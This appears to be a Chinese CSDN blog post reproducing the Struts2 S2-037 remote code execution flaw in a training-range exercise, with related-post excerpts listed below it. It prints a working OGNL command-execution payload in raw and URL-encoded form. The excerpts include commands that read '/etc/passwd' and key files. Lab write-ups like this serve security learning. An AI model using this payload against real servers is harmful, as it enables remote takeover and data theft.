0x29. Apache Struts2远程代码执行漏洞(S2-037)复现

最新推荐文章于 2024-01-22 09:57:50 发布
最新推荐文章于 2024-01-22 09:57:50 发布
阅读量587 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 S2-037
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102676943
版权

s2-037:使用REST插件启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式;使用http://localhost:8080/1/XXX这种请求方式,XXX可以是任何合法的名字 ,通过将XXX构造为OGNL执行命令;

poc:

#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#process=@java.lang.Runtime@getRuntime().exec(#parameters.command[0]),#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()),@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros),#ros.flush(),#xx=123,#xx.toString.json?command=ls

编码后:

%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23process%3d%40java.lang.Runtime%40getRuntime().exec(%23parameters.command%5b0%5d)%2c%23ros%3d(%40org.apache.struts2.ServletActionContext%40getResponse().getOutputStream())%2c%40org.apache.commons.io.IOUtils%40copy(%23process.getInputStream()%2c%23ros)%2c%23ros.flush()%2c%23xx%3d123%2c%23xx.toString.json?command=ls

列出目录;

构造命令得到key值;

或直接使用工具检测;

半情调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-Apache Struts2远程代码执行漏洞(S2-037)复现
asd158923328的博客
08-22 1558
根据题意 漏洞概述:Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438,目前命名为S2-037。,黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有s...
墨者Apache Struts2远程代码执行漏洞(S2-037)复现题解
zr1213159840的博客
01-15 812
也还是继续找poc,我们使用以下poc #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#process=@java.lang.Runtime@getRuntime().exec(#parameters.command[0]),#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()),@org.apache.commons.io.IOUtils@
墨者学院-Apache Struts2远程代码执行漏洞(S2-037)复现
JimWu的博客
09-04 802
Apache Struts2远程代码执行漏洞(S2-037)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理:利用REST插件调用特定表达式实现远程执行代码。 1.打开靶场,了解一下S2-037漏洞的原理。 2.构造poc,执行命令ls /查看文件。 %23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_A...
Struts(S2-037)远程代码执行漏洞预警
煜铭2011
06-16 8480
Struts(S2-037)远程代码执行 一、漏洞基本信息 CVE编号:CVE-2016-4438 漏洞名称:Struts(S2-037)远程代码执行 漏洞发布日期:2016.615 受影响的软件及系统:Apache struts 2.3.20 - 2.3.28.1 版本使用了REST插件的用户 漏洞概述:Apache Struts 2是世界上最流行的Java Web服务器框
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-037)复现
weixin_42079912的博客
08-09 351
漏洞原理是在使用REST插件时,可以传递可用于在服务器端执行任意代码的恶意表达式。 打开靶场网页,等网页加载完。如果没有加载完(靶场环境可能没有完全部署好),可能会影响工具检测结果。 方法一:Struts2漏洞检查工具2017版下载地址:https://www.jb51.net/softs/574358.html。 打开Struts2漏洞检查工具2017版。将靶场网址输入进去,数据提交方式更改...
windows无法连接到打印机SHA-2代码签名补丁win7修复工具打印机连接错误0x0004005.rar
12-16
在使用Windows操作系统时,尤其是Windows 7或更早版本,可能会遇到“无法连接到打印机”的问题,这种情况通常伴随着错误代码0x00004005。此问题的根源可能涉及多种因素,包括系统兼容性、驱动程序不兼容、网络连接...
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
06-24
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
毕业设计企业网站源码-s2-052-reproducing:s2-052-再现
06-06
S2-052(CVE-2017-9805)远程代码执行漏洞 0x00 漏洞描述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。 Struts2是一个基于MVC设计模式的...
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
Apache Struts2远程代码执行漏洞(S2-037)复现
qq_36933272的博客
09-01 833
打开struts漏洞检测工具,输入地址,发现 警告:存在Struts2远程代码执行漏洞-编号S2-046 返回验证标志:struts2_security_check 警告:存在Struts2远程代码执行漏洞-编号S2-045 返回验证标志:struts2_security_check 执行命令,ls查看目录,发现key.txt cat key.txt,得到key ...
Struts 2再曝远程代码执行漏洞S2-037
weixin_33717298的博客
06-22 131
导读今年4月份,Apache Stuts 2之上发现的S2-033远程代码执行漏洞,以迅雷不及掩耳之势席卷而来。其利用代码很快就在短时间内迅速传播。而且官方针对这个高危漏洞的修复方案还是无效的。   悲剧的事情今天又再度发生了,这次发现的Struts 2新漏洞编号为CVE-2016-4438。 这是又一个很严重的远程代码执行漏洞:使用了REST插件的用户就会遭遇该问题,有关该漏洞的详情如下: ...
Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
热门推荐
yx9o
03-26 1万+
Struts2 S2-016,S2-017远程代码执行漏洞解决,修复 官网描述如下: http://struts.apache.org/release/2.3.x/docs/s2-016.html 怎么解决呢?
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838)
qq_51577576的博客
10-13 1412
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838) S2-007和S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式
Struts2远程代码执行漏洞S2-045利用及修复
u014416842的博客
04-13 4172
升级到struts-2.3.32, 发现无法调用getter方法public class Action { private Map yTypeList = new LinkedHashMap(); // getYtypeList public Map getYTypeList() { yTypeList.put("a", "invalid yTypeList a");
UDS 0x29 安全认证服务深入浅出
最新发布
weixin_44842720的博客
01-22 1535
1.0x29服务应用场景 2.0x27安全访问服务及0x29安全认证服务对比 3.0x29服务涉及相关基础安全概念介绍 4.0x29服务认证流程 5.参考文献
UDS关于0x29认证服务诊断签名与验签(一)
weixin_42362797的博客
12-06 2131
该服务的目的是为客户提供一种证明其身份的方法,使其能够访问出于安全、排放或安全等原因而限制访问的数据和/或诊断服务。用于将例程或数据下载/上传到服务器以及从服务器读取特定内存位置的诊断服务可能需要身份验证。不适当的例程或下载到服务器的数据可能会造成潜在的损害。
跟我学UDS(ISO14229) ———— 0x29(Authentication)
永远的菜鸡小詹的博客
08-08 5955
该服务的目的是为客户提供一种证明其身份的方法,允许其访问数据或诊断服务,这部分数据或服务因安全、排放或安全原因而受到限制。该服务致力于解决将例程或数据下载或上传到服务器并从服务器读取特定内存位置的诊断服务是可能需要身份验证的情况。不当程序或数据可能会损坏电子设备或其他车辆组件,或危及车辆遵守排放、安全或安保标准的风险。另一方面,从服务器检索数据也可能会违反数据安全性。该服务支持两个安全概念:1. 基于使用非对称加密的 PKI 证书交换程序。...
rmi远程代码执行漏洞_Apache Struts2059远程代码执行漏洞复现
weixin_36346221的博客
12-16 82
网安引领时代,弥天点亮未来0x00漏洞简述2020年08月13日,Apache官方发布了Struts2远程代码执行漏洞的风险通告,该漏洞编号为CVE-2019-0230,漏洞等级:高危,漏洞评分:8.5。漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设...
arm编程实现0x5000开始20个字数据存储单元 0x44332201到0x44332214.并将小端转换为大端
03-22
以下是实现该功能的 ARM 汇编代码: ``` .section .data data: .byte 0x01, 0x22, 0x33, 0x44 .byte 0x02, 0x22, 0x33, 0x44 .byte 0x03, 0x22, 0x33, 0x44 .byte 0x04, 0x22, 0x33, 0x44 .byte 0x05, 0x22, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值